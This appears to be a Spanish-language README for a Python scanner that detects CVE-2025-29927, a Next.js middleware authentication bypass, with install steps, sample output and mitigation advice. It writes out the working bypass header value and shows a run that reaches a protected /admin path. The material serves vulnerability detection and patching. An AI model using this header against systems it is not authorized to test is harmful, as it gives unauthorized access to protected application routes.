
🔐 Escáner inteligente basado en Python para CVE-2025-29927: vulnerabilidad de omisión de autenticación de middleware de Next.js. Detecta meta refresh, redirecciones basadas en palabras clave y más.
Este escáner inteligente basado en Python ayuda a detectar la vulnerabilidad CVE-2025-29927 en aplicaciones Next.js: una omisión crítica de middleware que permite a los atacantes saltarse la autenticación usando una cabecera HTTP manipulada.
🧠 La herramienta no solo identifica redirecciones HTTP, sino también mecanismos de redirección del lado del cliente como
<meta http-equiv="refresh">, redirecciones de inicio de sesión basadas en palabras clave y omisiones silenciosas de autenticación.
x-middleware-subrequest<meta refresh>login, sign in, authentication$ python3 CVE-2025-29927.py
🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin
→ Testing with header: middleware:middleware:middleware:middleware:middleware
↳ HTTP Status: 200
↳ Redirect detected: No
✅ VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Main interactive scanner
├── requirements.txt # Python dependencies
└── README.md # This file
requests
beautifulsoup4
colorama
Si tu aplicación está afectada, haz lo siguiente:
v15.2.3 o posterior (o 14.2.25+ / 13.5.7+)x-middleware-subrequest en el borde (por ejemplo, Nginx):proxy_set_header x-middleware-subrequest "";
CVE-2025-29927 permite a los atacantes omitir las comprobaciones del middleware de Next.js manipulando la cabecera x-middleware-subrequest con valores diseñados como:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
En versiones vulnerables, esto desactiva por completo la ejecución del middleware — permitiendo el acceso directo a rutas protegidas como /dashboard, /admin, etc.
Mantenido por: @mrzblackhat
No dudes en contactarme por Telegram para sugerencias, mejoras o contribuciones.
next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking
Esta herramienta se proporciona solo con fines educativos y de investigación. Úsala de forma responsable.